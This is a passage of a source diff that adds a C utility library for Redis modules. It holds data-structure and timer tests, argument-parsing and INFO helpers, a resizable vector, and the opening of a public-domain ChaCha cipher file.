+    int *__a = (int *) a;
+    int *__b = (int *) b;
+    return *__a - *__b;
+}
+
+int main(int argc, char **argv) {
+    int myints[] = {10, 20, 30, 5, 15};
+    Vector *v = NewVector(int, 5);
+    for (int i = 0; i < 5; i++) {
+        Vector_Push(v, myints[i]);
+    }
+
+    Make_Heap(v, 0, v->top, cmp);
+
+    int n;
+    Vector_Get(v, 0, &n);
+    assert(30 == n);
+
+    Heap_Pop(v, 0, v->top, cmp);
+    v->top = 4;
+    Vector_Get(v, 0, &n);
+    assert(20 == n);
+
+    Vector_Push(v, 99);
+    Heap_Push(v, 0, v->top, cmp);
+    Vector_Get(v, 0, &n);
+    assert(99 == n);
+
+    Vector_Free(v);
+    printf("PASS!\n");
+    return 0;
+}
+
@@ -0,0 +1,26 @@
+#include <stdio.h>
+#include <redismodule.h>
+#include <unistd.h>
+#include "periodic.h"
+#include "assert.h"
+#include "test.h"
+
+void timerCb(RedisModuleCtx *ctx, void *p) {
+  int *x = p;
+  (*x)++;
+}
+
+int testPeriodic() {
+  int x = 0;
+  struct RMUtilTimer *tm = RMUtil_NewPeriodicTimer(
+      timerCb, NULL, &x, (struct timespec){.tv_sec = 0, .tv_nsec = 10000000});
+
+  sleep(1);
+
+  ASSERT_EQUAL(0, RMUtilTimer_Terminate(tm));
+  ASSERT(x > 0);
+  ASSERT(x <= 100);
+  return 0;
+}
+
+TEST_MAIN({ TESTFUNC(testPeriodic); });
@@ -0,0 +1,37 @@
+#include <stdio.h>
+#include "assert.h"
+#include "priority_queue.h"
+
+int cmp(void* i1, void* i2) {
+    int *__i1 = (int*) i1;
+    int *__i2 = (int*) i2;
+    return *__i1 - *__i2;
+}
+
+int main(int argc, char **argv) {
+    PriorityQueue *pq = NewPriorityQueue(int, 10, cmp);
+    assert(0 == Priority_Queue_Size(pq));
+
+    for (int i = 0; i < 5; i++) {
+        Priority_Queue_Push(pq, i);
+    }
+    assert(5 == Priority_Queue_Size(pq));
+
+    Priority_Queue_Pop(pq);
+    assert(4 == Priority_Queue_Size(pq));
+
+    Priority_Queue_Push(pq, 10);
+    Priority_Queue_Push(pq, 20);
+    Priority_Queue_Push(pq, 15);
+    int n;
+    Priority_Queue_Top(pq, &n);
+    assert(20 == n);
+
+    Priority_Queue_Pop(pq);
+    Priority_Queue_Top(pq, &n);
+    assert(15 == n);
+
+    Priority_Queue_Free(pq);
+    printf("PASS!\n");
+    return 0;
+}
@@ -0,0 +1,67 @@
+#ifndef __TEST_UTIL_H__
+#define __TEST_UTIL_H__
+
+#include "util.h"
+#include <stdarg.h>
+#include <stdlib.h>
+#include <string.h>
+
+
+#define RMUtil_Test(f) \
+                if (argc < 2 || RMUtil_ArgExists(__STRING(f), argv, argc, 1)) { \
+                    int rc = f(ctx); \
+                    if (rc != REDISMODULE_OK) { \
+                        RedisModule_ReplyWithError(ctx, "Test " __STRING(f) " FAILED"); \
+                        return REDISMODULE_ERR;\
+                    }\
+                }
+           
+                
+#define RMUtil_Assert(expr) if (!(expr)) { fprintf (stderr, "Assertion '%s' Failed\n", __STRING(expr)); return REDISMODULE_ERR; }
+
+#define RMUtil_AssertReplyEquals(rep, cstr) RMUtil_Assert( \
+            RMUtil_StringEquals(RedisModule_CreateStringFromCallReply(rep), RedisModule_CreateString(ctx, cstr, strlen(cstr))) \
+            )
+#            
+
+/**
+* Create an arg list to pass to a redis command handler manually, based on the format in fmt.
+* The accepted format specifiers are:
+*   c - for null terminated c strings
+*   s - for RedisModuleString* objects
+*   l - for longs
+*
+*  Example:  RMUtil_MakeArgs(ctx, &argc, "clc", "hello", 1337, "world");
+*
+*  Returns an array of RedisModuleString pointers. The size of the array is store in argcp
+*/
+RedisModuleString **RMUtil_MakeArgs(RedisModuleCtx *ctx, int *argcp, const char *fmt, ...) {
+    
+    va_list ap;
+    va_start(ap, fmt);
+    RedisModuleString **argv = calloc(strlen(fmt), sizeof(RedisModuleString*));
+    int argc = 0;
+    const char *p = fmt;
+    while(*p) {
+        if (*p == 'c') {
+            char *cstr = va_arg(ap,char*);
+            argv[argc++] = RedisModule_CreateString(ctx, cstr, strlen(cstr));
+        } else if (*p == 's') {
+            argv[argc++] = va_arg(ap,void*);;
+        } else if (*p == 'l') {
+            long ll = va_arg(ap,long long);
+            argv[argc++] = RedisModule_CreateStringFromLongLong(ctx, ll);
+        } else {
+            goto fmterr;
+        }
+        p++;
+    }
+    *argcp = argc;
+    
+    return argv;
+fmterr:
+    free(argv);
+    return NULL;
+}
+
+#endif
@@ -0,0 +1,58 @@
+#include "vector.h"
+#include <stdio.h>
+#include "test.h"
+
+int testVector() {
+
+  Vector *v = NewVector(int, 1);
+  ASSERT(v != NULL);
+  // Vector_Put(v, 0, 1);
+  // Vector_Put(v, 1, 3);
+  for (int i = 0; i < 10; i++) {
+    Vector_Push(v, i);
+  }
+  ASSERT_EQUAL(10, Vector_Size(v));
+  ASSERT_EQUAL(16, Vector_Cap(v));
+
+  for (int i = 0; i < Vector_Size(v); i++) {
+    int n;
+    int rc = Vector_Get(v, i, &n);
+    ASSERT_EQUAL(1, rc);
+    // printf("%d %d\n", rc, n);
+
+    ASSERT_EQUAL(n, i);
+  }
+
+  Vector_Free(v);
+
+  v = NewVector(char *, 0);
+  int N = 4;
+  char *strings[4] = {"hello", "world", "foo", "bar"};
+
+  for (int i = 0; i < N; i++) {
+    Vector_Push(v, strings[i]);
+  }
+  ASSERT_EQUAL(N, Vector_Size(v));
+  ASSERT(Vector_Cap(v) >= N);
+
+  for (int i = 0; i < Vector_Size(v); i++) {
+    char *x;
+    int rc = Vector_Get(v, i, &x);
+    ASSERT_EQUAL(1, rc);
+    ASSERT_STRING_EQ(x, strings[i]);
+  }
+
+  int rc = Vector_Get(v, 100, NULL);
+  ASSERT_EQUAL(0, rc);
+
+  Vector_Free(v);
+
+  return 0;
+  // Vector_Push(v, "hello");
+  // Vector_Push(v, "world");
+  // char *x = NULL;
+  // int rc = Vector_Getx(v, 0, &x);
+  // printf("rc: %d got %s\n", rc, x);
+}
+
+TEST_MAIN({ TESTFUNC(testVector); });
@@ -0,0 +1,299 @@
+#include <stdlib.h>
+#include <errno.h>
+#include <math.h>
+#include <ctype.h>
+#include <sys/time.h>
+#include <stdarg.h>
+#include <limits.h>
+#include <string.h>
+#define REDISMODULE_EXPERIMENTAL_API
+#include <redismodule.h>
+#include "util.h"
+
+/**
+Check if an argument exists in an argument list (argv,argc), starting at offset.
+@return 0 if it doesn't exist, otherwise the offset it exists in
+*/
+int RMUtil_ArgExists(const char *arg, RedisModuleString **argv, int argc, int offset) {
+
+  size_t larg = strlen(arg);
+  for (; offset < argc; offset++) {
+    size_t l;
+    const char *carg = RedisModule_StringPtrLen(argv[offset], &l);
+    if (l != larg) continue;
+    if (carg != NULL && strncasecmp(carg, arg, larg) == 0) {
+      return offset;
+    }
+  }
+  return 0;
+}
+
+/**
+Check if an argument exists in an argument list (argv,argc)
+@return -1 if it doesn't exist, otherwise the offset it exists in
+*/
+int RMUtil_ArgIndex(const char *arg, RedisModuleString **argv, int argc) {
+
+  size_t larg = strlen(arg);
+  for (int offset = 0; offset < argc; offset++) {
+    size_t l;
+    const char *carg = RedisModule_StringPtrLen(argv[offset], &l);
+    if (l != larg) continue;
+    if (carg != NULL && strncasecmp(carg, arg, larg) == 0) {
+      return offset;
+    }
+  }
+  return -1;
+}
+
+RMUtilInfo *RMUtil_GetRedisInfo(RedisModuleCtx *ctx) {
+
+  RedisModuleCallReply *r = RedisModule_Call(ctx, "INFO", "c", "all");
+  if (r == NULL || RedisModule_CallReplyType(r) == REDISMODULE_REPLY_ERROR) {
+    return NULL;
+  }
+
+  int cap = 100;  // rough estimate of info lines
+  RMUtilInfo *info = malloc(sizeof(RMUtilInfo));
+  info->entries = calloc(cap, sizeof(RMUtilInfoEntry));
+
+  int i = 0;
+  size_t sz;
+  char *text = (char *)RedisModule_CallReplyStringPtr(r, &sz);
+
+  char *line = text;
+  while (line && line < text + sz) {
+    char *line = strsep(&text, "\r\n");
+    if (line == NULL) break;
+
+    if (!(*line >= 'a' && *line <= 'z')) {  // skip non entry lines
+      continue;
+    }
+
+    char *key = strsep(&line, ":");
+    info->entries[i].key = strdup(key);
+    info->entries[i].val = strdup(line);
+    i++;
+    if (i >= cap) {
+      cap *= 2;
+      info->entries = realloc(info->entries, cap * sizeof(RMUtilInfoEntry));
+    }
+  }
+  info->numEntries = i;
+  RedisModule_FreeCallReply(r);
+  return info;
+}
+void RMUtilRedisInfo_Free(RMUtilInfo *info) {
+  for (int i = 0; i < info->numEntries; i++) {
+    free(info->entries[i].key);
+    free(info->entries[i].val);
+  }
+  free(info->entries);
+  free(info);
+}
+
+int RMUtilInfo_GetInt(RMUtilInfo *info, const char *key, long long *val) {
+
+  const char *p = NULL;
+  if (!RMUtilInfo_GetString(info, key, &p)) {
+    return 0;
+  }
+
+  *val = strtoll(p, NULL, 10);
+  if ((errno == ERANGE && (*val == LONG_MAX || *val == LONG_MIN)) || (errno != 0 && *val == 0)) {
+    *val = -1;
+    return 0;
+  }
+
+  return 1;
+}
+
+int RMUtilInfo_GetString(RMUtilInfo *info, const char *key, const char **str) {
+  int i;
+  for (i = 0; i < info->numEntries; i++) {
+    if (!strcmp(key, info->entries[i].key)) {
+      *str = info->entries[i].val;
+      return 1;
+    }
+  }
+  return 0;
+}
+
+int RMUtilInfo_GetDouble(RMUtilInfo *info, const char *key, double *d) {
+  const char *p = NULL;
+  if (!RMUtilInfo_GetString(info, key, &p)) {
+    printf("not found %s\n", key);
+    return 0;
+  }
+
+  *d = strtod(p, NULL);
+  if ((errno == ERANGE && (*d == HUGE_VAL || *d == -HUGE_VAL)) || (errno != 0 && *d == 0)) {
+    return 0;
+  }
+
+  return 1;
+}
+
+/*
+c -- pointer to a Null terminated C string pointer.
+b -- pointer to a C buffer, followed by pointer to a size_t for its length
+s -- pointer to a RedisModuleString
+l -- pointer to Long long integer.
+d -- pointer to a Double
+* -- do not parse this argument at all
+*/
+int RMUtil_ParseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, ...) {
+  va_list ap;
+  va_start(ap, fmt);
+  int rc = rmutil_vparseArgs(argv, argc, offset, fmt, ap);
+  va_end(ap);
+  return rc;
+}
+
+// Internal function that parses arguments based on the format described above
+int rmutil_vparseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, va_list ap) {
+
+  int i = offset;
+  char *c = (char *)fmt;
+  while (*c && i < argc) {
+
+    // read c string
+    if (*c == 'c') {
+      char **p = va_arg(ap, char **);
+      *p = (char *)RedisModule_StringPtrLen(argv[i], NULL);
+    } else if (*c == 'b') {
+      char **p = va_arg(ap, char **);
+      size_t *len = va_arg(ap, size_t *);
+      *p = (char *)RedisModule_StringPtrLen(argv[i], len);
+    } else if (*c == 's') {  // read redis string
+
+      RedisModuleString **s = va_arg(ap, void *);
+      *s = argv[i];
+
+    } else if (*c == 'l') {  // read long
+      long long *l = va_arg(ap, long long *);
+
+      if (RedisModule_StringToLongLong(argv[i], l) != REDISMODULE_OK) {
+        return REDISMODULE_ERR;
+      }
+    } else if (*c == 'd') {  // read double
+      double *d = va_arg(ap, double *);
+      if (RedisModule_StringToDouble(argv[i], d) != REDISMODULE_OK) {
+        return REDISMODULE_ERR;
+      }
+    } else if (*c == '*') {  // skip current arg
+      // do nothing
+    } else {
+      return REDISMODULE_ERR;  // WAT?
+    }
+    c++;
+    i++;
+  }
+  // if the format is longer than argc, retun an error
+  if (*c != 0) {
+    return REDISMODULE_ERR;
+  }
+  return REDISMODULE_OK;
+}
+
+int RMUtil_ParseArgsAfter(const char *token, RedisModuleString **argv, int argc, const char *fmt,
+                          ...) {
+
+  int pos = RMUtil_ArgIndex(token, argv, argc);
+  if (pos < 0) {
+    return REDISMODULE_ERR;
+  }
+
+  va_list ap;
+  va_start(ap, fmt);
+  int rc = rmutil_vparseArgs(argv, argc, pos + 1, fmt, ap);
+  va_end(ap);
+  return rc;
+}
+
+RedisModuleCallReply *RedisModule_CallReplyArrayElementByPath(RedisModuleCallReply *rep,
+                                                              const char *path) {
+  if (rep == NULL) return NULL;
+
+  RedisModuleCallReply *ele = rep;
+  const char *s = path;
+  char *e;
+  long idx;
+  do {
+    errno = 0;
+    idx = strtol(s, &e, 10);
+
+    if ((errno == ERANGE && (idx == LONG_MAX || idx == LONG_MIN)) || (errno != 0 && idx == 0) ||
+        (REDISMODULE_REPLY_ARRAY != RedisModule_CallReplyType(ele)) || (s == e)) {
+      ele = NULL;
+      break;
+    }
+    s = e;
+    ele = RedisModule_CallReplyArrayElement(ele, idx - 1);
+
+  } while ((ele != NULL) && (*e != '\0'));
+
+  return ele;
+}
+
+int RedisModule_TryGetValue(RedisModuleKey *key, const RedisModuleType *type, void **out) {
+  if (key == NULL) {
+    return RMUTIL_VALUE_MISSING;
+  }
+  int keytype = RedisModule_KeyType(key);
+  if (keytype == REDISMODULE_KEYTYPE_EMPTY) {
+    return RMUTIL_VALUE_EMPTY;
+  } else if (keytype == REDISMODULE_KEYTYPE_MODULE && RedisModule_ModuleTypeGetType(key) == type) {
+    *out = RedisModule_ModuleTypeGetValue(key);
+    return RMUTIL_VALUE_OK;
+  } else {
+    return RMUTIL_VALUE_MISMATCH;
+  }
+}
+
+RedisModuleString **RMUtil_ParseVarArgs(RedisModuleString **argv, int argc, int offset,
+                                        const char *keyword, size_t *nargs) {
+  if (offset > argc) {
+    return NULL;
+  }
+
+  argv += offset;
+  argc -= offset;
+
+  int ix = RMUtil_ArgIndex(keyword, argv, argc);
+  if (ix < 0) {
+    return NULL;
+  } else if (ix >= argc - 1) {
+    *nargs = RMUTIL_VARARGS_BADARG;
+    return argv;
+  }
+
+  argv += (ix + 1);
+  argc -= (ix + 1);
+
+  long long n = 0;
+  RMUtil_ParseArgs(argv, argc, 0, "l", &n);
+  if (n > argc - 1 || n < 0) {
+    *nargs = RMUTIL_VARARGS_BADARG;
+    return argv;
+  }
+
+  *nargs = n;
+  return argv + 1;
+}
+
+void RMUtil_DefaultAofRewrite(RedisModuleIO *aof, RedisModuleString *key, void *value) {
+  RedisModuleCtx *ctx = RedisModule_GetThreadSafeContext(NULL);
+  RedisModuleCallReply *rep = RedisModule_Call(ctx, "DUMP", "s", key);
+  if (rep != NULL && RedisModule_CallReplyType(rep) == REDISMODULE_REPLY_STRING) {
+    size_t n;
+    const char *s = RedisModule_CallReplyStringPtr(rep, &n);
+    RedisModule_EmitAOF(aof, "RESTORE", "slb", key, 0, s, n);
+  } else {
+    RedisModule_Log(RedisModule_GetContextFromIO(aof), "warning", "Failed to emit AOF");
+  }
+  if (rep != NULL) {
+    RedisModule_FreeCallReply(rep);
+  }
+  RedisModule_FreeThreadSafeContext(ctx);
+}
@@ -0,0 +1,149 @@
+#ifndef __UTIL_H__
+#define __UTIL_H__
+
+#include <redismodule.h>
+#include <stdarg.h>
+
+/// make sure the response is not NULL or an error, and if it is sends the error to the client and
+/// exit the current function
+#define RMUTIL_ASSERT_NOERROR(ctx, r)                                   \
+  if (r == NULL) {                                                      \
+    return RedisModule_ReplyWithError(ctx, "ERR reply is NULL");        \
+  } else if (RedisModule_CallReplyType(r) == REDISMODULE_REPLY_ERROR) { \
+    RedisModule_ReplyWithCallReply(ctx, r);                             \
+    return REDISMODULE_ERR;                                             \
+  }
+
+#define __rmutil_register_cmd(ctx, cmd, f, mode)                                \
+  if (RedisModule_CreateCommand(ctx, cmd, f, mode, 1, 1, 1) == REDISMODULE_ERR) \
+    return REDISMODULE_ERR;
+
+#define RMUtil_RegisterReadCmd(ctx, cmd, f) __rmutil_register_cmd(ctx, cmd, f, "readonly")
+
+#define RMUtil_RegisterWriteCmd(ctx, cmd, f) __rmutil_register_cmd(ctx, cmd, f, "write")
+
+/* RedisModule utilities. */
+
+/** DEPRECATED: Return the offset of an arg if it exists in the arg list, or 0 if it's not there */
+int RMUtil_ArgExists(const char *arg, RedisModuleString **argv, int argc, int offset);
+
+/* Same as argExists but returns -1 if not found. Use this, RMUtil_ArgExists is kept for backwards
+compatibility. */
+int RMUtil_ArgIndex(const char *arg, RedisModuleString **argv, int argc);
+
+/**
+Automatically conver the arg list to corresponding variable pointers according to a given format.
+You pass it the command arg list and count, the starting offset, a parsing format, and pointers to
+the variables.
+The format is a string consisting of the following identifiers:
+
+    c -- pointer to a Null terminated C string pointer.
+    s -- pointer to a RedisModuleString
+    l -- pointer to Long long integer.
+    d -- pointer to a Double
+    * -- do not parse this argument at all
+
+Example: If I want to parse args[1], args[2] as a long long and double, I do:
+    double d;
+    long long l;
+    RMUtil_ParseArgs(argv, argc, 1, "ld", &l, &d);
+*/
+int RMUtil_ParseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, ...);
+
+/**
+Same as RMUtil_ParseArgs, but only parses the arguments after `token`, if it was found.
+This is useful for optional stuff like [LIMIT [offset] [limit]]
+*/
+int RMUtil_ParseArgsAfter(const char *token, RedisModuleString **argv, int argc, const char *fmt,
+                          ...);
+
+int rmutil_vparseArgs(RedisModuleString **argv, int argc, int offset, const char *fmt, va_list ap);
+
+#define RMUTIL_VARARGS_BADARG ((size_t)-1)
+/**
+ * Parse arguments in the form of KEYWORD {len} {arg} .. {arg}_len.
+ * If keyword is present, returns the position within `argv` containing the arguments.
+ * Returns NULL if the keyword is not found.
+ * If a parse error has occurred, `nargs` is set to RMUTIL_VARARGS_BADARG, but
+ * the return value is not NULL.
+ */
+RedisModuleString **RMUtil_ParseVarArgs(RedisModuleString **argv, int argc, int offset,
+                                        const char *keyword, size_t *nargs);
+
+/**
+ * Default implementation of an AoF rewrite function that simply calls DUMP/RESTORE
+ * internally. To use this function, pass it as the .aof_rewrite value in
+ * RedisModuleTypeMethods
+ */
+void RMUtil_DefaultAofRewrite(RedisModuleIO *aof, RedisModuleString *key, void *value);
+
+// A single key/value entry in a redis info map
+typedef struct {
+  char *key;
+  char *val;
+} RMUtilInfoEntry;
+
+// Representation of INFO command response, as a list of k/v pairs
+typedef struct {
+  RMUtilInfoEntry *entries;
+  int numEntries;
+} RMUtilInfo;
+
+/**
+* Get redis INFO result and parse it as RMUtilInfo.
+* Returns NULL if something goes wrong.
+* The resulting object needs to be freed with RMUtilRedisInfo_Free
+*/
+RMUtilInfo *RMUtil_GetRedisInfo(RedisModuleCtx *ctx);
+
+/**
+* Free an RMUtilInfo object and its entries
+*/
+void RMUtilRedisInfo_Free(RMUtilInfo *info);
+
+/**
+* Get an integer value from an info object. Returns 1 if the value was found and
+* is an integer, 0 otherwise. the value is placed in 'val'
+*/
+int RMUtilInfo_GetInt(RMUtilInfo *info, const char *key, long long *val);
+
+/**
+* Get a string value from an info object. The value is placed in str.
+* Returns 1 if the key was found, 0 if not
+*/
+int RMUtilInfo_GetString(RMUtilInfo *info, const char *key, const char **str);
+
+/**
+* Get a double value from an info object. Returns 1 if the value was found and is
+* a correctly formatted double, 0 otherwise. the value is placed in 'd'
+*/
+int RMUtilInfo_GetDouble(RMUtilInfo *info, const char *key, double *d);
+
+/*
+* Returns a call reply array's element given by a space-delimited path. E.g.,
+* the path "1 2 3" will return the 3rd element from the 2 element of the 1st
+* element from an array (or NULL if not found)
+*/
+RedisModuleCallReply *RedisModule_CallReplyArrayElementByPath(RedisModuleCallReply *rep,
+                                                              const char *path);
+
+/**
+ * Extract the module type from an opened key.
+ */
+typedef enum {
+  RMUTIL_VALUE_OK = 0,
+  RMUTIL_VALUE_MISSING,
+  RMUTIL_VALUE_EMPTY,
+  RMUTIL_VALUE_MISMATCH
+} RMUtil_TryGetValueStatus;
+
+/**
+ * Tries to extract the module-specific type from the value.
+ * @param key an opened key (may be null)
+ * @param type the pointer to the type to match to
+ * @param[out] out if the value is present, will be set to it.
+ * @return a value in the @ref RMUtil_TryGetValueStatus enum.
+ */
+int RedisModule_TryGetValue(RedisModuleKey *key, const RedisModuleType *type, void **out);
+
+#endif
@@ -0,0 +1,88 @@
+#include "vector.h"
+#include <stdio.h>
+
+inline int __vector_PushPtr(Vector *v, void *elem) {
+  if (v->top == v->cap) {
+    Vector_Resize(v, v->cap ? v->cap * 2 : 1);
+  }
+
+  __vector_PutPtr(v, v->top, elem);
+  return v->top;
+}
+
+inline int Vector_Get(Vector *v, size_t pos, void *ptr) {
+  // return 0 if pos is out of bounds
+  if (pos >= v->top) {
+    return 0;
+  }
+
+  memcpy(ptr, v->data + (pos * v->elemSize), v->elemSize);
+  return 1;
+}
+
+/* Get the element at the end of the vector, decreasing the size by one */
+inline int Vector_Pop(Vector *v, void *ptr) {
+  if (v->top > 0) {
+    if (ptr != NULL) {
+      Vector_Get(v, v->top - 1, ptr);
+    }
+    v->top--;
+    return 1;
+  }
+  return 0;
+}
+
+inline int __vector_PutPtr(Vector *v, size_t pos, void *elem) {
+  // resize if pos is out of bounds
+  if (pos >= v->cap) {
+    Vector_Resize(v, pos + 1);
+  }
+
+  if (elem) {
+    memcpy(v->data + pos * v->elemSize, elem, v->elemSize);
+  } else {
+    memset(v->data + pos * v->elemSize, 0, v->elemSize);
+  }
+  // move the end offset to pos if we grew
+  if (pos >= v->top) {
+    v->top = pos + 1;
+  }
+  return 1;
+}
+
+int Vector_Resize(Vector *v, size_t newcap) {
+  int oldcap = v->cap;
+  v->cap = newcap;
+
+  v->data = realloc(v->data, v->cap * v->elemSize);
+
+  // If we grew:
+  // put all zeros at the newly realloc'd part of the vector
+  if (newcap > oldcap) {
+    int offset = oldcap * v->elemSize;
+    memset(v->data + offset, 0, v->cap * v->elemSize - offset);
+  }
+  return v->cap;
+}
+
+Vector *__newVectorSize(size_t elemSize, size_t cap) {
+  Vector *vec = malloc(sizeof(Vector));
+  vec->data = calloc(cap, elemSize);
+  vec->top = 0;
+  vec->elemSize = elemSize;
+  vec->cap = cap;
+
+  return vec;
+}
+
+void Vector_Free(Vector *v) {
+  free(v->data);
+  free(v);
+}
+
+
+/* return the used size of the vector, regardless of capacity */
+inline int Vector_Size(Vector *v) { return v->top; }
+
+/* return the actual capacity */
+inline int Vector_Cap(Vector *v) { return v->cap; }
@@ -0,0 +1,73 @@
+#ifndef __VECTOR_H__
+#define __VECTOR_H__
+#include <stdlib.h>
+#include <string.h>
+#include <stdarg.h>
+
+/*
+* Generic resizable vector that can be used if you just want to store stuff
+* temporarily.
+* Works like C++ std::vector with an underlying resizable buffer
+*/
+typedef struct {
+    char *data;
+    size_t elemSize;
+    size_t cap;
+    size_t top;
+
+} Vector;
+
+/* Create a new vector with element size. This should generally be used
+ * internall by the NewVector macro */
+Vector *__newVectorSize(size_t elemSize, size_t cap);
+
+// Put a pointer in the vector. To be used internall by the library
+int __vector_PutPtr(Vector *v, size_t pos, void *elem);
+
+/*
+* Create a new vector for a given type and a given capacity.
+* e.g. NewVector(int, 0) - empty vector of ints
+*/
+#define NewVector(type, cap) __newVectorSize(sizeof(type), cap)
+
+/*
+* get the element at index pos. The value is copied in to ptr. If pos is outside
+* the vector capacity, we return 0
+* otherwise 1
+*/
+int Vector_Get(Vector *v, size_t pos, void *ptr);
+
+/* Get the element at the end of the vector, decreasing the size by one */
+int Vector_Pop(Vector *v, void *ptr);
+
+//#define Vector_Getx(v, pos, ptr) pos < v->cap ? 1 : 0; *ptr =
+//*(typeof(ptr))(v->data + v->elemSize*pos)
+
+/*
+* Put an element at pos.
+* Note: If pos is outside the vector capacity, we resize it accordingly
+*/
+#define Vector_Put(v, pos, elem) __vector_PutPtr(v, pos, elem ? &(typeof(elem)){elem} : NULL)
+
+/* Push an element at the end of v, resizing it if needed. This macro wraps
+ * __vector_PushPtr */
+#define Vector_Push(v, elem) __vector_PushPtr(v, elem ? &(typeof(elem)){elem} : NULL)
+
+int __vector_PushPtr(Vector *v, void *elem);
+
+/* resize capacity of v */
+int Vector_Resize(Vector *v, size_t newcap);
+
+/* return the used size of the vector, regardless of capacity */
+int Vector_Size(Vector *v);
+
+/* return the actual capacity */
+int Vector_Cap(Vector *v);
+
+/* free the vector and the underlying data. Does not release its elements if
+ * they are pointers*/
+void Vector_Free(Vector *v);
+
+int __vecotr_PutPtr(Vector *v, size_t pos, void *elem);
+
+#endif
@@ -0,0 +1,224 @@
+/*
+chacha-merged.c version 20080118
+D. J. Bernstein
+Public domain.
+*/
+
+/* $OpenBSD: chacha_private.h,v 1.2 2013/10/04 07:02:27 djm Exp $ */
+
+#include <stddef.h>
+
+typedef unsigned char u8;
+typedef unsigned int u32;
+
+typedef struct
+{
+  u32 input[16]; /* could be compressed */
+} chacha_ctx;
+
+#define U8C(v) (v##U)
+#define U32C(v) (v##U)
+
+#define U8V(v) ((u8)(v) & U8C(0xFF))
+#define U32V(v) ((u32)(v) & U32C(0xFFFFFFFF))
+
+#define ROTL32(v, n) \
+  (U32V((v) << (n)) | ((v) >> (32 - (n))))
+
+#define U8TO32_LITTLE(p) \
+  (((u32)((p)[0])      ) | \
+   ((u32)((p)[1]) <<  8) | \
+   ((u32)((p)[2]) << 16) | \
+   ((u32)((p)[3]) << 24))
+
+#define U32TO8_LITTLE(p, v) \
+  do { \
+    (p)[0] = U8V((v)      ); \
+    (p)[1] = U8V((v) >>  8); \
+    (p)[2] = U8V((v) >> 16); \
+    (p)[3] = U8V((v) >> 24); \
+  } while (0)
+
+#define ROTATE(v,c) (ROTL32(v,c))
+#define XOR(v,w) ((v) ^ (w))
+#define PLUS(v,w) (U32V((v) + (w)))
+#define PLUSONE(v) (PLUS((v),1))
+
+#define QUARTERROUND(a,b,c,d) \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a),16); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c),12); \
+  a = PLUS(a,b); d = ROTATE(XOR(d,a), 8); \
+  c = PLUS(c,d); b = ROTATE(XOR(b,c), 7);
+
+static const char sigma[16] = "expand 32-byte k";
+static const char tau[16] = "expand 16-byte k";
+
+static void
+chacha_keysetup(chacha_ctx *x,const u8 *k,u32 kbits,u32 ivbits)
+{
+  const char *constants;
+
+  x->input[4] = U8TO32_LITTLE(k + 0);
+  x->input[5] = U8TO32_LITTLE(k + 4);
+  x->input[6] = U8TO32_LITTLE(k + 8);
+  x->input[7] = U8TO32_LITTLE(k + 12);
+  if (kbits == 256) { /* recommended */
+    k += 16;
+    constants = sigma;
+  } else { /* kbits == 128 */
+    constants = tau;
+  }
+  x->input[8] = U8TO32_LITTLE(k + 0);
+  x->input[9] = U8TO32_LITTLE(k + 4);
+  x->input[10] = U8TO32_LITTLE(k + 8);
+  x->input[11] = U8TO32_LITTLE(k + 12);
+  x->input[0] = U8TO32_LITTLE(constants + 0);
+  x->input[1] = U8TO32_LITTLE(constants + 4);
+  x->input[2] = U8TO32_LITTLE(constants + 8);
+  x->input[3] = U8TO32_LITTLE(constants + 12);
+}
+
+static void
+chacha_ivsetup(chacha_ctx *x,const u8 *iv)
+{
+  x->input[12] = 1;
+  x->input[13] = U8TO32_LITTLE(iv + 0);
+  x->input[14] = U8TO32_LITTLE(iv + 4);
+  x->input[15] = U8TO32_LITTLE(iv + 8);
+}
+
+static void
+chacha_encrypt_bytes(chacha_ctx *x,const u8 *m,u8 *c,u32 bytes)
+{
+  u32 x0, x1, x2, x3, x4, x5, x6, x7, x8, x9, x10, x11, x12, x13, x14, x15;
+  u32 j0, j1, j2, j3, j4, j5, j6, j7, j8, j9, j10, j11, j12, j13, j14, j15;
+  u8 *ctarget = NULL;
+  u8 tmp[64];
+  u32 i;
+
+  if (!bytes) return;
+
+  j0 = x->input[0];
+  j1 = x->input[1];
+  j2 = x->input[2];
+  j3 = x->input[3];
+  j4 = x->input[4];
+  j5 = x->input[5];
+  j6 = x->input[6];
+  j7 = x->input[7];
+  j8 = x->input[8];
+  j9 = x->input[9];
+  j10 = x->input[10];
+  j11 = x->input[11];
+  j12 = x->input[12];
+  j13 = x->input[13];
+  j14 = x->input[14];
+  j15 = x->input[15];
+
+  for (;;) {
+    if (bytes < 64) {
+      for (i = 0;i < bytes;++i) tmp[i] = m[i];
+      m = tmp;
+      ctarget = c;
+      c = tmp;
+    }
+    x0 = j0;
+    x1 = j1;
+    x2 = j2;
+    x3 = j3;
+    x4 = j4;
+    x5 = j5;
+    x6 = j6;
+    x7 = j7;
+    x8 = j8;
+    x9 = j9;
+    x10 = j10;
+    x11 = j11;
+    x12 = j12;
+    x13 = j13;
+    x14 = j14;
+    x15 = j15;
+    for (i = 20;i > 0;i -= 2) {
+      QUARTERROUND( x0, x4, x8,x12)
+      QUARTERROUND( x1, x5, x9,x13)
+      QUARTERROUND( x2, x6,x10,x14)
+      QUARTERROUND( x3, x7,x11,x15)
+      QUARTERROUND( x0, x5,x10,x15)
+      QUARTERROUND( x1, x6,x11,x12)
+      QUARTERROUND( x2, x7, x8,x13)
+      QUARTERROUND( x3, x4, x9,x14)
+    }
+    x0 = PLUS(x0,j0);
+    x1 = PLUS(x1,j1);
+    x2 = PLUS(x2,j2);
+    x3 = PLUS(x3,j3);
+    x4 = PLUS(x4,j4);
+    x5 = PLUS(x5,j5);
+    x6 = PLUS(x6,j6);
+    x7 = PLUS(x7,j7);
+    x8 = PLUS(x8,j8);
+    x9 = PLUS(x9,j9);
+    x10 = PLUS(x10,j10);
+    x11 = PLUS(x11,j11);
+    x12 = PLUS(x12,j12);
+    x13 = PLUS(x13,j13);
+    x14 = PLUS(x14,j14);
+    x15 = PLUS(x15,j15);
+
+#ifndef KEYSTREAM_ONLY
+    x0 = XOR(x0,U8TO32_LITTLE(m + 0));
+    x1 = XOR(x1,U8TO32_LITTLE(m + 4));
+    x2 = XOR(x2,U8TO32_LITTLE(m + 8));
+    x3 = XOR(x3,U8TO32_LITTLE(m + 12));
+    x4 = XOR(x4,U8TO32_LITTLE(m + 16));
+    x5 = XOR(x5,U8TO32_LITTLE(m + 20));
